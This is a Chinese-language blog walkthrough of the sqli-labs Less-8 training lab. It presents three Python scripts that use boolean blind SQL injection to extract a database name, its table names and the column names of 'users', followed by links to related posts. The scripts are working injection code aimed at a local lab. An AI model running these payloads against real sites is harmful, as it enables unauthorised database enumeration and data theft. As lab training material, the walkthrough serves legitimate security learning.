sqli_labs_master Less-8 时间盲注,boolen盲注 获取数据库中的表、列

获取当前数据库名

复制代码
import requests


def inject_database(url):
    name=''
    max_length=20  # 假设数据库名称最大长度为20
    # ASCII范围:数字、字母、下划线(_)
    low={'a': 97, 'z': 122, 'A': 65, 'Z': 90, '0': 48, '9': 57, '_': 95}
    high={97: 'a', 122: 'z', 65: 'A', 90: 'Z', 48: '0', 57: '9', 95: '_'}

    for i in range(1, max_length + 1):
        low_val=32  # 起始为空格的ASCII码
        high_val=122  # 到z的ASCII码

        # 执行二分查找来找到每个字符
        while low_val < high_val:
            middle_val=(low_val + high_val) // 2
            payload=f"1' AND ASCII(SUBSTRING(DATABASE(),{i},1))>{middle_val}-- "
            params={"id": payload}
            r=requests.get(url, params=params)

            # 判断注入是否成功
            if 'You are in' in r.text:
                low_val=middle_val + 1
            else:
                high_val=middle_val

        # 获取字符并更新数据库名
        if low_val > 32:  # 跳过空格和其他不可见字符
            char=chr(low_val)
            name+=char
            print(f"Current database name: {name}")

        # 重置
        low_val=32
        high_val=122

    print(f"Final database name: {name}")


if __name__ == "__main__":
    url="http://sqli-labs:8013/Less-8/"
    inject_database(url)

结果

获取数据库表

复制代码
import requests


def inject_table_names(url, database_name):
    table_names=[]  # 用于存储所有表名
    max_length=20  # 假设每个表名的最大长度为20

    # 限制字符范围:数字、字母、下划线
    allowed_chars=list(range(48, 58)) + list(range(65, 91)) + list(range(97, 123)) + [95]  # 0-9, A-Z, a-z, _

    # 获取数据库中所有表的个数
    # 查询所有表:我们假设表名的个数不超过100
    num_tables=100
    for table_index in range(num_tables):
        table_name=''
        for i in range(1, max_length + 1):
            low=min(allowed_chars)  # 最小值:'0',ASCII 48
            high=max(allowed_chars)  # 最大值:'z',ASCII 122
            middle=(low + high) // 2

            while low < high:
                # 构造布尔盲注的 payload,查询当前表的名字
                payload=f"1' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='{database_name}' LIMIT {table_index},1),{i},1))>{middle}-- "
                params={"id": payload}
                r=requests.get(url, params=params)

                # 判断注入是否成功,依据靶场的返回信息
                if 'You are in' in r.text:  # 判断返回信息
                    low=middle + 1
                else:
                    high=middle
                middle=(low + high) // 2

            # 只拼接有效字符,跳过空格(ASCII 32)和其他非打印字符
            if middle in allowed_chars:  # 确保是有效字符
                table_name+=chr(middle)

            # 每次获取一个字符后打印当前的表名
            print(f"Current table name: {table_name}")

            # 重置 low 和 high 的值
            low=min(allowed_chars)
            high=max(allowed_chars)
            middle=(low + high) // 2

        if table_name:  # 如果当前表名非空,则保存它
            table_names.append(table_name)

        # 如果注入出了多个表,可以停止
        if len(table_names) >= 5:  # 假设只注入前五个表名
            break

    print(f"Final table names: {table_names}")


if __name__ == "__main__":
    url="http://sqli-labs:8013/Less-8/"
    database_name="security"  # 目标数据库名称
    inject_table_names(url, database_name)

结果

获取表的列

复制代码
import requests


def inject_column_names(url, database_name, table_name):
    column_names=[]  # 用于存储所有列名
    max_length=20  # 假设列名最大长度为20

    # 限制字符范围:数字、字母、下划线
    allowed_chars=list(range(48, 58)) + list(range(65, 91)) + list(range(97, 123)) + [95]  # 0-9, A-Z, a-z, _

    # 获取表的所有列的个数
    num_columns=100  # 假设该表最多有100列

    for column_index in range(num_columns):
        column_name=''
        for i in range(1, max_length + 1):
            low=min(allowed_chars)  # 最小值:'0',ASCII 48
            high=max(allowed_chars)  # 最大值:'z',ASCII 122
            middle=(low + high) // 2

            while low < high:
                # 构造布尔盲注的 payload,查询当前列的名字
                payload=f"1' AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='{database_name}' AND table_name='{table_name}' LIMIT {column_index},1),{i},1))>{middle}-- "
                params={"id": payload}
                r=requests.get(url, params=params)

                # 判断注入是否成功,依据靶场的返回信息
                if 'You are in' in r.text:  # 判断返回信息
                    low=middle + 1
                else:
                    high=middle
                middle=(low + high) // 2

            # 只拼接有效字符,跳过空格(ASCII 32)和其他非打印字符
            if middle in allowed_chars:  # 确保是有效字符
                column_name+=chr(middle)

            # 每次获取一个字符后打印当前的列名
            print(f"Current column name: {column_name}")

            # 重置 low 和 high 的值
            low=min(allowed_chars)
            high=max(allowed_chars)
            middle=(low + high) // 2

        # 检查是否是有效的列名
        if column_name and not column_name.startswith("0"):  # 去掉以 "0" 开头的无效列名
            column_names.append(column_name)

        # 如果注入出了多个列,可以停止
        if len(column_names) >= 5:  # 假设只注入前五个列名
            break

    # 输出最终的列名
    print(f"Final column names: {column_names}")


if __name__ == "__main__":
    url="http://sqli-labs:8013/Less-8/"
    database_name="security"  # 目标数据库名称
    table_name="users"  # 目标表名
    inject_column_names(url, database_name, table_name)

结果

相关推荐
CoderJia程序员甲1 小时前
系统分析师知识点:访问控制模型OBAC、RBAC、TBAC与ABAC的对比与应用
网络安全·访问控制·技术选型·系统分析师
cnsinda_sdc2 小时前
源代码加密之零日攻击
大数据·网络·安全·web安全
virelin_Y.lin2 小时前
系统与网络安全------弹性交换网络(1)
网络·安全·web安全·vlan·交换机·trunk
东方隐侠安全团队-千里3 小时前
DeepSeek赋能Nuclei:打造网络安全检测的“超级助手”
网络·安全·web安全
Blockchina5 小时前
区块链交易自动化新时代:实战体验 Maestro 智能机器人
web安全·web3·区块链·智能合约·solidity
Haku Coder6 小时前
网络安全零基础培训 L1-3 Kali命令基础
安全·web安全·网络安全
李詹20 小时前
防护接入新纪元:DeepSeek攻防大脑如何重塑网络安全防线
网络·安全·web安全·游戏引擎·游戏程序
2301_8101545520 小时前
小迪第10天http/s数据包
网络·深度学习·网络协议·安全·web安全·http·网络安全
风舞雪凌月20 小时前
【安全】DVWA靶场渗透
安全·web安全·云原生·eureka
Bruce_Liuxiaowei1 天前
基于Flask的网络安全渗透知识库系统架构解析
web安全·系统架构·flask